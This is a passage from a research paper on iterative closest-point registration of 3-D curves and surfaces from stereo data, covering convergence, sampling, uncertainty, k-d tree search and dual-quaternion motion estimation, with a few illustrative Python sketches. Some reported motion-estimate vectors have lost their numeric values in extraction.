As described earlier, each iteration of our algorithm consists of four main steps. The first is to find the closest points, at an expected cost of O(m log n), where m and n are the numbers of points in the first and second frames, respectively. The second is to update the matches recovered in the first step, at a cost of O(m). The third is to compute the 3-D motion, also at a cost of O(m). The last is to apply the estimated motion to all points in the first frame, at a cost of O(m). Thus the total complexity of our algorithm is O(m log n).
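The four steps of an iteration can be sketched as follows. This is a deliberately simplified illustration, not the paper's implementation: 2-D points, a brute-force O(mn) closest-point search standing in for the k-d tree, a fixed threshold standing in for the adaptive D_max, and a translation-only motion update standing in for the dual-quaternion estimation of Appendix B:

```python
def one_iteration(first, second, d_max):
    """One iteration of the matching loop, heavily simplified.
    `first` and `second` are lists of (x, y) tuples."""
    def dist2(p, q):
        return (p[0] - q[0]) ** 2 + (p[1] - q[1]) ** 2
    # Step 1: find, for each point of the first frame, its closest point
    # in the second frame (O(m n) here; a k-d tree gives O(m log n)).
    pairs = [(p, min(second, key=lambda q: dist2(p, q))) for p in first]
    # Step 2: update the matches -- keep only pairings closer than d_max.
    pairs = [(p, q) for p, q in pairs if dist2(p, q) ** 0.5 < d_max]
    if not pairs:
        return first, (0.0, 0.0)
    # Step 3: estimate the motion from the retained matches (here just the
    # mean displacement; the paper estimates a full rigid motion).
    tx = sum(q[0] - p[0] for p, q in pairs) / len(pairs)
    ty = sum(q[1] - p[1] for p, q in pairs) / len(pairs)
    # Step 4: apply the estimated motion to all points of the first frame.
    moved = [(p[0] + tx, p[1] + ty) for p in first]
    return moved, (tx, ty)

frame2 = [(0.0, 0.0), (1.0, 0.0), (2.0, 1.0)]
frame1 = [(x - 0.3, y + 0.1) for x, y in frame2]  # shifted copy
moved, t = one_iteration(frame1, frame2, d_max=1.0)
print(t)  # close to (0.3, -0.1), undoing the shift
```

Only steps 1 and 2 involve the neighbor search; steps 3 and 4 are linear in the number of points, which is why the per-iteration cost is dominated by the O(m log n) search.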
In Zhang (1992a), we show that our algorithm has a lower computational cost than the string-based curve matching algorithms, e.g., Schwartz and Sharir (1987).

7.2 About Convergence

Convergence is always an important issue for an iterative procedure. Our algorithm cannot be guaranteed to reach the global minimum. Although we have observed, given a reasonable starting point, good convergence of our algorithm in the experimental sections, we are not able to show that it converges monotonically to a local minimum. This is unlike the algorithm of Besl and McKay (1992) (see Section 8), which always converges monotonically to a local minimum. The difference is that p_i in our objective function (2) can take the value one or zero depending on the situation. As will become clear, however, our algorithm is well-behaved. Let us examine one iteration, say iteration I, in detail. As described in Section 3.2, only points whose distances to their closest points in the second frame are less than D_max^{I-1} are retained as potential matches. The mean squared error d_closest^I of these matches, given by

d_closest^I = (1 / Σ_{i=1}^m p_i) Σ_{i=1}^m p_i ||R^{I-1} x_i + t^{I-1} - y_i||²,

is upper-bounded by D_max^{I-1}, i.e., d_closest^I ≤ D_max^{I-1}. Then a statistical analysis of the distances is carried out, and a new distance threshold D_max^I is computed. The pairings whose distances are greater than D_max^I are discarded, i.e., their p_i's are set to zero. Thus the mean squared error d_update^I of the updated matches, given by the same expression restricted to the retained pairings, is less than d_closest^I, i.e., d_update^I ≤ d_closest^I. We have of course d_update^I ≤ D_max^I. The least-squares technique described in Section 3.4 is applied to the remaining matches, and a new motion estimate (R^I, t^I) is obtained.
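The effect of the retention and update steps on the mean squared error can be checked on made-up numbers (the distances and thresholds below are invented for illustration; since every retained distance is below the threshold, the mean squared error is below the squared threshold):

```python
def mean_sq(ds):
    """Mean squared value of a list of distances."""
    return sum(d * d for d in ds) / len(ds)

dmax_prev, dmax_new = 0.5, 0.3  # D_max^{I-1} and D_max^I (invented)

# Distances of the candidate closest-point pairings at iteration I.
all_d = [0.1, 0.2, 0.4, 0.7]
closest = [d for d in all_d if d < dmax_prev]    # retained matches
updated = [d for d in closest if d <= dmax_new]  # kept after the update

d_closest, d_update = mean_sq(closest), mean_sq(updated)
# Discarding the largest distances can only decrease the mean squared
# error, and each retained d < D_max^{I-1} bounds it by the square.
assert d_update <= d_closest <= dmax_prev ** 2
print(round(d_closest, 3), round(d_update, 3))  # 0.07 0.025
```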
Let

d_lsq^I = (1 / Σ_{i=1}^m p_i) Σ_{i=1}^m p_i ||R^I x_i + t^I - y_i||².

We always have d_lsq^I ≤ d_update^I, because if we had d_lsq^I > d_update^I, then the zero motion (R^I = I, t^I = 0) would yield a smaller mean squared error, which contradicts the least-squares property. Thus we have

d_lsq^I ≤ d_update^I ≤ min(d_closest^I, D_max^I), and d_closest^I ≤ D_max^{I-1}.

Unfortunately, we do not have the inequality d_closest^{I+1} ≤ d_lsq^I. Indeed, d_closest^{I+1} consists of two parts. The first consists of the x_i's which also contribute to d_lsq^I; we can easily show that this part is always decreasing. The second part consists of the x_i's which do not contribute to d_lsq^I, but whose distances to their closest points are less than D_max^I. The combination of the two parts is not necessarily less than d_lsq^I. As is clear from the above discussion, the objective function is upper-bounded by D_max. As the registration becomes better and better, D_max in general becomes smaller and smaller, but it may occasionally become bigger. In order to ensure a monotonic decrease of D_max, we must impose D_max^I ≤ D_max^{I-1} after computing D_max^I as described in Section 3.3. We have done this and rerun the algorithm with the synthetic and real data presented in Section 5, and exactly the same results have been obtained. We have also rerun the algorithm with the data presented in Section 6. For test 1, the estimate after 40 iterations is [ × 10^-3, × 10^-2, × 10^-3, × 10^-2, × 10^-2, × 10^-2]^T. There is a difference of 0.11 degrees in rotation and 0.86 centimeters in translation. For test 2, we obtained the same motion estimate after 40 iterations. The estimate after 80 iterations is [ × 10^-3, × 10^-3, × 10^-2, × 10^-2, × 10^-2, × 10^-2]^T. There is a difference of 0.37 degrees in rotation and 3.28 centimeters in translation. For test 3, the estimate after 40 iterations is [ × 10^-2, × 10^-3, × 10^-3, × 10^-3, × 10^-2, × 10^-2]^T. There is a difference of 0.24 degrees in rotation and 1.73 centimeters in translation.
These differences are sufficiently small compared with the resolution of the data (about 5 centimeters). In Figure 30, two graphs are shown. The first plots the evolution of the mean distance (i.e., the objective function) versus the iteration number. The second plots the evolution of the number of matches after the update versus the iteration number (one example has already been given in the last row of Table 1). The data presented in Section 6 have been used. Note that there are two curves for test 2: "Test 2" for iterations 1 to 40, and "Test 2bis" for iterations 41 to 80. About one fourth (17,749) of the points in the first view have been used. From Figure 30a, we see that the mean distance decreases towards 0.04 meters in all three tests. These curves confirm that our algorithm is well-behaved. As shown in Figure 30b, the number of matches varies continuously through the iterations and finally steadies.

7.3 About Simplifications

For computational reasons, we have made two simplifications. The first is that the non-symmetric matching criterion (2) is used instead of the symmetric one (1). The second is that the approximate distance metric (4) is used; this will be discussed in Section 7.4. The symmetric matching criterion (1) has in fact also been implemented for curves. Table 4 gives a comparison of the results using the two criteria. The synthetic data in Section 5 are used. Different levels of Gaussian noise are added. Ten iterations are applied in each case. Rotation errors, translation errors, and execution times are shown, each being the average of ten trials. The algorithm using the symmetric criterion yields better motion estimates than that using the non-symmetric one.
This is expected because the data in the two frames both contribute to the motion estimation and neither frame prevails over the other. On the other hand, the execution time using the symmetric criterion is twice as long. We have also carried out an experiment with the real data described in Section 5. The algorithm using the symmetric criterion converges after 12 iterations, yielding a motion estimate r = [ × 10^-3, × 10^-2, × 10^-3]^T, t = [ × 10, × 10, × 10^2]^T. The difference compared with that using the non-symmetric criterion is 0.6% in both rotation and translation. The execution time is 70.2 seconds on a SUN 4/60 workstation, about twice as long. Thus in time-critical applications the non-symmetric matching criterion is preferred.

Fig. 30. Evolution of (a) the mean distance and (b) the number of matches versus the iteration number

7.4 About Sampling

As described earlier, the algorithm developed is based on the use of a simplified, instead of real, definition of the distance between a point and a shape (see Equation 4). That is, we use the minimum of all distances from a given point to each sample point of the shape. Different samplings of a shape (even when the approximation error is negligible) do affect the final estimate of the motion.

Table 4. Comparison between the matching criteria (1) and (2): rotation error, translation error, and execution time

Take a simple example of curves as shown in Figure 31. The curve consists of two line segments (Figure 31a). The sampling in the first frame consists of three points, indicated by the crosses in Figure 31a. We have two samplings in the second frame.
The first sampling consists of three points, indicated by dark dots, and the second sampling consists of five points, obtained by adding two additional ones (indicated by empty dots) to the first sampling, as shown in Figure 31a. The motion result between the two frames with the first sampling is shown in Figure 31b, and that with the second sampling in Figure 31c. Clearly, more samples yield better results. To solve the problem resulting from sampling, we should ideally use the real distance definition (Equation 3) and use the real closest points instead of the closest sample points. However, we then lose the efficiency achieved with sample points. One possible improvement, as proposed in Besl and McKay (1992), could be the following: first, create a piecewise-simplex (line segments or triangles) approximation of the shape in the second frame (e.g., the Delaunay triangulation of the sample points (Faugeras et al. 1990)); then, given a point in the first frame, a pure Newton minimization procedure can be used to find the real closest point, starting from the closest sample point. There is an easier way to overcome the sampling problem while maintaining the efficiency of the algorithm. It consists of simply increasing the number of sample points through interpolation. The more sample points there are, the less the sampling will affect the final motion estimate. However, this causes two problems: an increase in the memory required and an increase in the search time (because we also increase the size of the k-d tree). Thus a tradeoff must be found. In the experiments we have carried out, we obtained satisfactory results using the closest sample points directly, because the sample points are sufficiently dense.

7.5 Uncertainty

The importance of explicitly estimating and manipulating uncertainty is now well recognized by the computer vision and robotics community (Blostein and Huang 1987; Matthies and Shafer 1987; Kriegman et al.
1989; Ayache and Faugeras 1989; Szeliski 1990). This is extremely important when the available data have different uncertainty distributions, for example in stereo, where uncertainty increases significantly with depth. We have shown in Zhang and Faugeras (1991) that accounting for uncertainty in motion estimation (via, e.g., a Kalman filter) yields much better results. For computational tractability and as a reasonable approximation, the uncertainty in a 3-D point reconstructed from stereo is usually modeled as Gaussian; that is, it is characterized by a 3-D position vector and a 3 × 3 covariance matrix. The algorithm for motion computation described in Section 3.4 is very efficient. However, it assumes that each point has equal uncertainty, and unfortunately it is difficult to extend it to take uncertainty fully into account. To do so, we could use for example Kalman filtering techniques, which have been widely and successfully applied to quite a number of vision problems (Zhang and Faugeras 1992a). However, this would entail a significant increase in computation. The method described below can partially take uncertainty into account. Indeed, we can associate with each pairing between the two frames a scalar weighting factor w_i. Instead of minimizing Equation 5, we compute R and t by minimizing the following weighted objective function:

F(R, t) = (1/N) Σ_{i=1}^N w_i ||R x_i + t - y_i||².   (8)

Fig. 31. Influence of curve sampling on motion estimation

The quaternion or dual quaternion method can still be used to compute R and t efficiently. The weighting factor w_i should be related to the uncertainty of R x_i + t - y_i. Let Λ_xi, Λ_yi, and Λ_i be the covariance matrices of x_i, y_i, and R x_i + t - y_i, respectively. Λ_xi and Λ_yi are given by the sensing system.
Λ_i is then computed as

Λ_i = R Λ_xi R^T + Λ_yi,

where R takes the rotation matrix computed during a previous iteration as an approximation. The trace of Λ_i roughly indicates the magnitude of the uncertainty of R x_i + t - y_i. Therefore, we choose w_i as

w_i = 1 / tr(Λ_i) = 1 / (tr(Λ_xi) + tr(Λ_yi)).

Thus, the weighting factor is independent of the motion. We have not implemented this method in the current version.

The mechanism for updating the matching, described in Section 3.3, has been designed without considering the different uncertainties in the data points. The same threshold D_max has been used for all points. If the uncertainties in the data points and in the motion are modeled, one would like to use a pruning criterion that better reflects the sources of uncertainty.³ The idea is the following, similar to that used in Zhang and Faugeras (1992a) for matching 3-D line segments. Let the point under consideration in the first view be x with covariance matrix Λ_x. Let the points in the second view be {y_i} with covariance matrices {Λ_yi}. Let the motion relating the two views be d with covariance matrix Λ_d. The vector d could be [r^T, t^T]^T. To be general, we define two functions relating d to the rotation matrix R and the translation t: R = f(d) and t = g(d). The (squared) Mahalanobis distance can be used to take the uncertainty into account. It is defined by

d_i^M = (f(d) x + g(d) - y_i)^T Λ_i^{-1} (f(d) x + g(d) - y_i),

which can be interpreted as the squared Euclidean distance weighted by the uncertainty measure. Λ_i is the covariance matrix of f(d) x + g(d) - y_i, and is given, up to first order, by

Λ_i = f(d) Λ_x f(d)^T + Λ_yi + J_d Λ_d J_d^T,

where J_d is the Jacobian ∂[f(d) x + g(d)] / ∂d. Now the closest point to x is the point y_i having the smallest distance d_i^M. The reader is referred to Zhang and Faugeras (1992a) for more details on the Mahalanobis distance. As described in Section 3.3, we do not want simply to match the closest point y_i with x.
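As a toy sketch of this gating idea, assume diagonal covariance matrices (so no matrix inversion is needed) and ignore the motion-uncertainty term J_d Λ_d J_d^T; none of the numbers below come from the paper:

```python
def mahalanobis_gate(residual, var_x, var_y, eps=7.81):
    """Chi-square gating of one pairing. `residual` is Rx + t - y;
    `var_x` and `var_y` are the per-axis variances of the two points
    (diagonal covariances assumed here for simplicity; the text uses
    full 3x3 covariance matrices and their inverse).
    Returns (squared Mahalanobis distance, accepted?)."""
    d2 = sum(r * r / (vx + vy)
             for r, vx, vy in zip(residual, var_x, var_y))
    # 7.81 is the 95% point of the chi-square distribution with 3 dof.
    return d2, d2 < eps

d2, ok = mahalanobis_gate(residual=(0.1, 0.0, -0.1),
                          var_x=(0.01, 0.01, 0.01),
                          var_y=(0.01, 0.01, 0.01))
print(round(d2, 2), ok)  # 1.0 True
```

With diagonal covariances the weighted distance reduces to a per-axis sum, which makes the gating criterion cheap to evaluate for every candidate pairing.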
In order for y_i and x to be matched, the Mahalanobis distance d_i^M must be less than some threshold ε. As d_i^M follows a χ² distribution with three degrees of freedom, we can choose an appropriate ε, for example 7.81 for a probability of 95%. In summary, if uncertainty is considered, we can replace the first two steps of the algorithm described in Section 3.5 by the following:

1. Find, for each point x in the first view, the point y_i having the smallest Mahalanobis distance d_i^M.
2. Discard the pairings {(x_i, y_i)} whose d_i^M's are larger than the threshold ε.

7.6 About Large Motion

Because of the local property of the matching criterion used, our algorithm converges to the closest minimum. It is thus best applied in situations where the motion is small or approximately known. In the case of large motion, the algorithm can be adapted in two different ways. The first way is to apply first the global methods cited in the introductory section to obtain an estimate, which can then be refined by applying the algorithm described in this paper. The second way is to obtain a set of initial registrations by sampling the 6-D motion space, and then apply our algorithm to each initial registration. The final estimate corresponding to the global minimum error is retained as the optimal one. A similar method has been used in Besl and McKay (1992) to solve the object recognition problem.

7.7 Multiple Object Motions

In a dynamic environment, there is usually more than one moving object. It is important to have a reliable algorithm for segmenting the scene into objects using motion information. However, little work has been done so far in this direction. We have proposed in Zhang and Faugeras (1992b) a framework to deal with multiple object motions. It consists of two levels. The first level deals with the tracking of 3-D tokens from frame to frame and the estimation of their motions.
The processing is completely parallel for each token. The second level groups tokens into objects based on the similarity of their motion parameters. Tokens coming from a single object should have the same motion parameters. In Zhang and Faugeras (1992b) the tokens used are 3-D line segments, and the experiments have shown that the framework is flexible and powerful. This framework is used in Navab and Zhang (1992) to solve for multiple object motions through the cooperation of motion and stereo. Now, if we replace 3-D line segments by 3-D curves and estimate the 3-D motion of each curve, the general framework is still applicable. For surfaces, we need to over-segment them into patches such that each patch belongs to only one object. We can then compute the motion of each patch and finally group these patches into objects according to motion similarity.

8 Highlights With Respect to Previous Work

As mentioned in the introduction, several pieces of similar but independent work have recently been published. They include Besl and McKay (1992); Chen and Medioni (1992); Menq et al. (1992); and Champleboux et al. (1992). The basic idea is the same: iteratively match points in one set to the closest points in another set, given that the transformation between the two sets is small. However, as each algorithm was developed in its own context, different techniques have been used. One of the main differences lies in the matching criterion. Refer to Equation 2. In our algorithm, p_i can take the value either 1 or 0, depending on whether the point in the first set has a reasonable match in the second set or not. This is determined by the maximum tolerable distance D_max, which, in turn, is set in a dynamic way by analyzing the statistics of the distances, as described in Section 3.3. Therefore, our algorithm is capable of dealing with the following situations:

- Gross outliers in the data. The outliers are automatically discarded in the matching and thus have no effect on the final motion estimate.
- Appearance and disappearance, in which curves in one set do not appear in the other set.
This is usually the case in navigation, where objects may enter or leave the field of view.
- Occlusion. An object may occlude other objects, and it may itself be occluded. This is common in both object recognition and navigation.

Besl and McKay (1992) have developed an algorithm for object recognition and location, where a portion of a given model shape is assumed to be observed. In their algorithm, p_i always takes the value 1. Thus, their algorithm can only deal with the case in which the first set is a subset of the second set. It is powerless in the situations described above. The quaternion algorithm is used to estimate the transformation between the two sets. The singular-value-decomposition algorithm by Haralick et al. (1989) is suggested as a replacement in order to identify outliers.

Chen and Medioni (1992) have developed an algorithm for registering multiple range images in order to create a complete model of an object. About one hundred points on a regular grid in the first range image, called control points, are used in order to save computation time. Only points in smooth areas are selected as control points, in order to find a reliable closest point by their method (see below). The method for motion estimation is not specified. Occlusion and outlier issues are not addressed.

Menq et al. (1992) have developed an algorithm for registering range data points with a CAD model for inspection purposes. In their algorithm, p_i always takes the value 1, too. Occlusion and outlier issues are not addressed. The transformation is estimated by solving a set of nonlinear equations.

Champleboux et al. (1992) have developed an algorithm for the registration of two sets of 3-D points obtained with a laser range finder.
Assuming that most (about 99%) of the points in one set match surfaces in the other, an iterative nonlinear least-squares technique (the Levenberg-Marquardt algorithm) is applied to find the rigid transformation between the two sets. When the iterative process converges, the points whose distances to the other set are larger than a prefixed threshold are considered to be outliers and are rejected. A few more iterations are then applied to the retained points.

Another main difference is in the procedure for closest-point computation. In our applications, dense point sets are available, which are directly sorted into a k-d tree for efficient closest-point search. In Besl and McKay (1992), several methods are proposed to compute the closest point on a geometric entity (point set, curve, or surface) to a given point. In Chen and Medioni (1992), the surface normal at each control point in the first set is computed; the closest point is found, through an iterative process, at the intersection of this surface normal with the digital surface in the second frame. In Menq et al. (1992), as the model is represented by a set of parametric surface patches, the closest point is determined by solving two nonlinear equations. In Champleboux et al. (1992), the first set of 3-D points is converted into an octree-spline, which is a classical octree decomposition of the work volume, followed by further subdivision near surface points. The Euclidean distances from the nodes to the surface are computed in an exhaustive manner and saved in the octree-spline. This allows them to quickly compute approximate Euclidean distances from points to the surface.

9 Conclusions

We have described an algorithm for registering two sets of 3-D curves obtained by using an edge-based stereo system, or two dense 3-D maps obtained by using a correlation-based stereo system.
We have used the assumption that the motion between the two frames is small or approximately known, a realistic assumption in many practical applications including visual navigation. A number of experiments have been carried out and good results have been obtained. Our algorithm has the following features:

- It is simple. The reader can easily reproduce the algorithm.
- It is extensible. More sophisticated strategies, such as figural continuity, can easily be integrated into the algorithm.
- It is general. First, the representation used, i.e., point sets, is general enough to represent arbitrary shapes of the type found in practice. Second, the ideas behind the algorithm are applicable to (many) other matching problems. The algorithm can easily be adapted to solve, for example, 2-D curve matching.
- It is efficient. The most expensive computation is the process of finding closest points, which has a complexity of O(N log N). Exploiting the coarse-to-fine strategy described in Section 4.3 considerably speeds up the algorithm with only a small change in the precision of the final estimate.
- It is robust to gross errors and can deal with the appearance, disappearance, and occlusion of objects, as described in Section 8. This is achieved by dynamically analyzing the statistics of the distances, as described in Section 3.3.
- It yields an accurate estimate, because all available information is used in the algorithm.
- It does not require any preprocessing of the 3-D point data, such as smoothing. The data are used as they are in our algorithm; that is, there is no approximation error.⁴ The registration results do not depend on any derivative estimation (which is sensitive to noise), in contrast with many other feature-based or string-based matching methods. However, imposing the orientation consistency in matching (Section 3.2) increases the convergence range of the algorithm.

Our algorithm can only partially take the uncertainty of the measurements into account.
To take the uncertainty fully into account, we should replace the quaternion or dual quaternion algorithm with other methods such as Kalman filtering techniques. This would cause a significant increase in the computational cost of the algorithm.

In our algorithm, one parameter, 𝒟, needs to be set. It indicates when the registration can be considered good. It has an impact on the convergence rate, as described in Section 4.1. This is a limitation of our algorithm. In our implementation, 𝒟 is related to the resolution of the available data. This method works well for all the experiments we have carried out. The result of our algorithm is not sensitive to the value of 𝒟: instead of 10 centimeters, we can set 𝒟 to 8 or 12 centimeters, and the same results are obtained. However, a better method probably exists. One question raised is: can the parameter 𝒟 be eliminated? The parameter 𝒟 was introduced out of concern that the initial estimate could be mediocre. If we have faith in the result provided by instruments such as the odometric and inertial systems on the mobile vehicle, then we can directly use 3σ (the first case in Section 3.3) to update the matching. The parameter 𝒟 is then not necessary.

Our algorithm converges (not necessarily monotonically) to the closest local minimum, and thus is not appropriate for solving large-motion problems. Two possible extensions of the algorithm to deal with large motions have been described in Section 7.6: coupling with a global method, or sampling the motion space.

The proposed algorithm works better in rugged terrain than on flat ground. This is because on flat ground there are many local minima which are very close to each other. Due to the local technique we exploit, the final motion estimate will in this case depend essentially on the initial one. Primitive-based methods will not work either, since no salient features can be extracted.
A Search for Closest Points With k-d Trees

Several methods exist to speed up the search for closest points, including bucketing techniques and k-d trees ("k-d" is an abbreviation for k-dimensional binary search tree). We have chosen k-d trees because the data points we have are sparse in space. Bucketing techniques are not efficient enough here, because only a few buckets would contain many points, and many others none.⁵ The k-d tree is a generalization of bisection in one dimension to k dimensions (Preparata and Shamos 1986). In our case, k = 3. A 3-D tree is constructed as follows. First choose a plane parallel to the yz-plane, passing through a data point P, to cut the whole space into two (generalized) rectangular parallelepipeds⁶ such that there are approximately equal numbers of points on either side of the cut. We obtain a left son and a right son. Next, each son is further split by a plane parallel to the xz-plane such that there are approximately equal numbers of points on either side of the cut, and we obtain a left grandson and a right one. We continue splitting each grandson by choosing a plane parallel to the xy-plane, and so on, letting the direction of the cutting plane at each step alternate among the yz-, xz-, and xy-planes. This splitting process stops when we reach a rectangular parallelepiped not containing any point; the corresponding node is a leaf of the tree. A k-d tree can be constructed in O(n log n) time with O(n) storage, both of which are optimal (Preparata and Shamos 1986).

We now investigate the use of the 3-D tree in searching for closest points. The standard way of using k-d trees is to find all points whose distances to x are within a given value. In our case, we want to find the closest point. One possibility is to use the standard technique to find all points within a given distance, and then to select the point having the smallest distance. We have developed a recursive algorithm which allows the given distance to vary.
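In a language like Python, the median-split construction and this varying-distance search can be sketched as follows (an illustrative translation of the procedure formalized in this appendix, with the two global variables carried in a small list):

```python
import math

class Node:
    def __init__(self, point, axis, left=None, right=None):
        self.point, self.axis = point, axis  # P(v) and t(v)
        self.left, self.right = left, right

def build(points, axis=0):
    """Split on the median along `axis`, alternating x, y, z."""
    if not points:
        return None  # a leaf: an empty cell
    points = sorted(points, key=lambda p: p[axis])
    mid = len(points) // 2
    nxt = (axis + 1) % 3
    return Node(points[mid], axis,
                build(points[:mid], nxt),
                build(points[mid + 1:], nxt))

def search(v, x, best):
    """Recursive closest-point search; `best` is [P, D], where D is the
    current search radius (initially D_max) and shrinks as better
    candidates are found."""
    if v is None:
        return
    c1, c2 = x[v.axis], v.point[v.axis]
    d = math.dist(x, v.point)
    if abs(c1 - c2) < best[1] and d < best[1]:
        best[0], best[1] = v.point, d
    if c1 - best[1] < c2:   # the left cell may contain a closer point
        search(v.left, x, best)
    if c2 - best[1] < c1:   # so may the right cell
        search(v.right, x, best)

pts = [(0.0, 0.0, 0.0), (1.0, 0.0, 0.0), (0.0, 2.0, 0.0), (3.0, 3.0, 3.0)]
tree = build(pts)
best = [None, 10.0]         # [P, D] with D initialized to D_max
search(tree, (0.9, 0.1, 0.0), best)
print(best[0])  # (1.0, 0.0, 0.0)
```

Because D shrinks during the recursion, subtrees whose cells lie farther than the best distance found so far are pruned, which is what makes the search fast in practice when D_max is small.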
The algorithm is thus more efficient. More formally, a node v of the 3-D tree T is characterized by two items (P(v), t(v)). Point P(v) is the point through which the space is cut into two. The parameter t(v), taking the value 0, 1, or 2, indicates whether the cutting plane is parallel to the yz-, xz-, or xy-plane. Two global variables P and D are used to save the point found and the corresponding distance. They are initialized to -1 and D_max, respectively. At the output, if P is still -1, it implies that we cannot find any point with distance less than D_max. The search for the closest point to x is conducted by calling SEARCH(root(T), x) of the following procedure:

input: a point x, a 3-D tree T; two global variables P and D initialized to -1 and D_max, respectively.
output: the closest point P and the corresponding distance D.
procedure SEARCH(v, x)
    if (v == leaf) return;
    c1 = x[t(v)];
    c2 = P(v)[t(v)];   /* c2 has been used to cut the space */
    if (|c1 - c2| < D) and (||x - P(v)|| < D) then P <- P(v), D <- ||x - P(v)||;
    if (c1 - D < c2) then SEARCH(leftson(v), x);
    if (c2 - D < c1) then SEARCH(rightson(v), x);

Unfortunately, the worst-case search time is O(n^(2/3)) with the 3-D tree method (see Preparata and Shamos 1986, p. 77). Other, more efficient algorithms exist, such as a direct access method, but they require much more storage. In practice, we observed good performance with 3-D trees. We found that the search time depends on D_max: when D_max is small, the search can be performed very fast. As we update D_max during each iteration, it becomes quite small after a few iterations.

B Motion Computation Using Dual Number Quaternions

For completeness, we summarize in this appendix the dual number quaternion method described in Walker et al. (1991), which can solve a weighted least-squares problem.
We can compute R and t by minimizing the following function 1 N Jr(R, t) = ~ E wi IIRxi + t - Yi 112, (9) i=i where wi is the positive weighting factor associated with the pairing between xi and yi. We can relate wi to the uncertainty in xi and Yi as shown in Section 7.5. A quaternion q can be considered as being either a 4-D vector [ql, q2, q3, q4] T or a pair ((t, q4) where Cl = [qt, q2, q3] r. A dual quatemion (t consists of two quaternions q and s, i.e., cl = q + ss, (10) where a special multiplication rule for s is defined by s 2 = 0. Two important matrix functions of quaternions are defined as Q(q) = [q4i+k(0)_ct T q4cl], (11) I q4i - K(O) 51 I (12) W(q) = -O r q4 ' where I is the identity matrix, and K((t) is the skewsymmetric matrix defined as K(0) = I 0 --q3 q2 ] q3 0 -ql -q2 ql 0 A 3-D rigid motion can be represented by a dual quatemion dl satisfying the following two constraints: qrq and qrs = 0. (13) Thus, we have still six independent parameters for representating a 3-D motion. The rotation matrix R can be expressed as R = (q42 - (tr61)i + 2C1(1T + 2q4K(O), (14) and the translation vector T = 15, where 15 is the vector part of the quaternion p given by p=w(q)ws. (15) The scalar part P4 of p is always zero. A 3-D vector x is identified with the quatemion (x, 0) 7, and we shall also use x to represent its corresponding quatemion if there is no ambiguity in the context. It can then be easily shown that Rx + t = W(Q)Ts + W(q)TQ(q)x. Thus the objective function Equation 5 can be written as a quadratic function of q and s S = l[qrclq + Wsrs + src2q + const.], (16) where N C1 = -2 E wiq(yi)tw(xi) i=1 N = -2 wi i=l K(y)K(x) + yx T --ytk(x) -K(y)x ] (17) yt x 28 146 Zhang N C2 = 2 E wi[w(xl) - Q(yi)] i=1 N[ ] = 2Ewi -K(x)-K(y) x-y (18) i=1 --(X -- y)t 0 ' N W = E wi, (19) i=1 N const. = E wi (x/rxi + y/ryi). (20) i=1 By adjoining the constraints (Equation 13), the optimal dual quatemion is obtained by minimizing f" = l[qrctq + Wsrs + srczq + const. 
\left. + \lambda_1 (q^T q - 1) + \lambda_2 (s^T q) \right],   (21)

where \lambda_1 and \lambda_2 are Lagrange multipliers. Taking the partial derivatives gives

\frac{\partial F'}{\partial q} = \frac{1}{N} \left[ (C_1 + C_1^T) q + C_2^T s + 2 \lambda_1 q + \lambda_2 s \right] = 0,   (22)

\frac{\partial F'}{\partial s} = \frac{1}{N} \left[ 2 W s + C_2 q + \lambda_2 q \right] = 0.   (23)

Multiplying Equation 23 by q^T gives \lambda_2 = -q^T C_2 q = 0, because C_2 is skew-symmetric. Thus s is given by

s = -\frac{1}{2W} C_2 q.   (24)

Substituting these into Equation 22 yields

A q = \lambda_1 q,   (25)

where

A = \frac{1}{2} \left[ \frac{1}{2W} C_2^T C_2 - C_1 - C_1^T \right].   (26)

Thus, the quaternion q is an eigenvector of the matrix A and \lambda_1 is the corresponding eigenvalue. Substituting the above result back into Equation 21 gives

F' = \frac{1}{N} (\text{const.} - \lambda_1).   (27)

The error is thus minimized if we select the eigenvector corresponding to the largest eigenvalue. Having computed q, the rotation matrix R is computed from Equation 14. The dual part s is computed from Equation 24, and the translation vector t can then be solved from Equation 15.

Acknowledgments

This work was carried out in part in the French CNES program VAP. The author would like to thank Olivier Faugeras for stimulating discussions during the work, Steve Maybank for carefully reading the draft version, and Xin Chen for providing the result described in Section 6.2. The author would also like to thank the anonymous reviewers for their suggestions and comments, which helped me improve this paper.

Notes

1. Here we assume the distribution of distances is approximately Gaussian when the registration is good. This has been confirmed by experiments. A typical histogram is shown in Figure 2. More strictly, the \chi^2 distribution is a better approximation if we use the sum of squared distances. As is well known in statistics (central limit theorem), the distribution can be well approximated by a Gaussian if a large number of samples are available. Indeed, we have more than one hundred point matches.
2. The double precision LINPACK rating for the SUN 4/60 is 1.05 Mflops.
3. I thank one of the reviewers for having raised this discussion.
4.
It is certain that errors have been introduced during the reconstruction of 3-D points, and that they have been propagated in the motion estimate.
5. Another possibility is to apply bucketing techniques in 2-D, for example, by projecting all points on the ground or on the image plane of the sensors. We have not compared this technique with the k-d trees.
6. A generalized rectangular parallelepiped is possibly an infinite volume.
7. Note that in Walker et al. (1991) a 3-D vector x is identified with the quaternion (x/2, 0).

References

Arun, K., Huang, T. and Blostein, S.: 1987, Least-squares fitting of two 3-D point sets, IEEE Trans. PAMI 9(5).
Ayache, N. and Faugeras, O. D.: 1989, Maintaining representations of the environment of a mobile robot, IEEE Trans. RA 5(6).
Besl, P. and Jain, R.: 1985, Three-dimensional object recognition, ACM Computing Surveys 17(1).
Besl, P. J.: 1988, Geometric modeling and computer vision, Proc. IEEE 76(8).
Besl, P. J. and McKay, N. D.: 1992, A method for registration of 3-D shapes, IEEE Trans. PAMI 14(2).
Blostein, S. and Huang, T.: 1987, Error analysis in stereo determination of a 3-D point position, IEEE Trans. PAMI 9(6).
Bolles, R. and Cain, R.: 1982, Recognizing and locating partially visible objects: the local-feature-focus method, Int'l J. Robotics Res. 1(3).
Brockett, R.: 1989, Least squares matching problems, Linear Algebra and Its Applications 122/123/124.
Champleboux, G., Lavallée, S., Szeliski, R. and Brunie, L.: 1992, From accurate range imaging sensor calibration to accurate model-based 3-D object localization, Proc. IEEE Conf. Comput. Vision Pattern Recog., Champaign, Illinois.
Chen, X.: 1992, Vision-Based Geometric Modeling, Ph.D. dissertation, Ecole Nationale Supérieure des Télécommunications, Paris, France.
Chen, Y.
and Medioni, G.: 1992, Object modelling by registration of multiple range images, Image and Vision Computing 10(3).
Chin, R. and Dyer, C.: 1986, Model-based recognition in robot vision, ACM Computing Surveys 18(1).
Faugeras, O. and Hebert, M.: 1986, The representation, recognition, and locating of 3-D shapes from range data, Int'l J. Robotics Res. 5(3).
Faugeras, O. D., Lebras-Mehlman, E. and Boissonnat, J.: 1990, Representing stereo data with the Delaunay triangulation, Artif. Intell.
